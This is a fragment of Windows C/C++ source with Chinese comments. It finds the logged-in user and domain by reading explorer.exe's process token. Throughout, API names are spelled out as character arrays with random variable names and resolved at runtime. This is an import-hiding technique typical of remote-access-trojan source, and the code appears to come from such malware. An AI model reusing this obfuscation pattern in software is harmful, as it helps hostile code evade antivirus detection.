char *GetLogUser2K() { typedef BOOL (WINAPI *OpenProcessTokenT)( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken"); typedef BOOL (WINAPI *LookupAccountSidAT)( __in_opt LPCSTR lpSystemName, __in PSID Sid, __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name, __inout LPDWORD cchName, __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName, __out PSID_NAME_USE peUse ); LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA"); typedef BOOL (WINAPI *GetTokenInformationT)( __in HANDLE TokenHandle, __in TOKEN_INFORMATION_CLASS TokenInformationClass, __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation, __in DWORD TokenInformationLength, __out_opt PDWORD ReturnLength ); GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation"); typedef HANDLE (WINAPI *OpenProcessT)( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId ); OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess"); DWORD dwProcessID = GetProcessID("explorer.exe"); if (dwProcessID == 0) return NULL; BOOL fResult = FALSE; HANDLE hProc = NULL; HANDLE hToken = NULL; TOKEN_USER *pTokenUser = NULL; char *lpUserName = NULL; __try { // Open the process with PROCESS_QUERY_INFORMATION access hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID); if (hProc == NULL) { __leave; } fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken); if(!fResult) { __leave; } DWORD dwNeedLen = 0; fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen); if (dwNeedLen > 0) { pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen]; fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen); if (!fResult) { __leave; } } else { __leave; } SID_NAME_USE sn; TCHAR szDomainName[MAX_PATH]; DWORD dwDmLen = MAX_PATH; DWORD nNameLen = 256; lpUserName = new char[256]; fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen, szDomainName, &dwDmLen, &sn); } __finally { if (hProc) ::CloseHandle(hProc); if (hToken) ::CloseHandle(hToken); if (pTokenUser) delete[] (char*)pTokenUser; return lpUserName; } }
//=================获得当前登陆用户名及计算机名称==================== BOOL GetCurrentUserName(char szUser[],char szDomain[]) { HANDLE hToken; //得到shell的token if(!GetTokenByName(hToken,"EXPLORER.EXE")) { return FALSE; } DWORD cbti = 0; PTOKEN_USER ptiUser = NULL; SID_NAME_USE snu; //取得所需空间大小 char JwFNw01[] = {'G','e','t','T','o','k','e','n','I','n','f','o','r','m','a','t','i','o','n','\0'}; GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw01); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); if (pGetTokenInformation(hToken, TokenUser, NULL, 0, &cbti)) { pCloseHandle(hToken); return FALSE; } //分配空间 char JwFNw02[] = {'G','e','t','P','r','o','c','e','s','s','H','e','a','p','\0'}; GetProcessHeapT pGetProcessHeap=(GetProcessHeapT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw02); char JwFNw03[] = {'H','e','a','p','A','l','l','o','c','\0'}; HeapAllocT pHeapAlloc=(HeapAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw03); ptiUser = (PTOKEN_USER) pHeapAlloc(pGetProcessHeap(), 0, cbti); if(!ptiUser) { pCloseHandle(hToken); return FALSE; } //取得token信息 char JwFNw05[] = {'H','e','a','p','F','r','e','e','\0'}; HeapFreeT pHeapFree=(HeapFreeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw05); if (!pGetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti)) { pCloseHandle(hToken); pHeapFree(pGetProcessHeap(), 0, ptiUser); return FALSE; } DWORD nUser = 50; DWORD nDomain = 50; //根据用户的sid得到用户名和domain char JwFNw06[] = {'L','o','o','k','u','p','A','c','c','o','u','n','t','S','i','d','A','\0'}; LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw06); if (!pLookupAccountSidA(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu)) { pCloseHandle(hToken); pHeapFree(pGetProcessHeap(), 0, ptiUser); return FALSE; } pCloseHandle(hToken); pHeapFree(pGetProcessHeap(), 0, ptiUser); return TRUE; }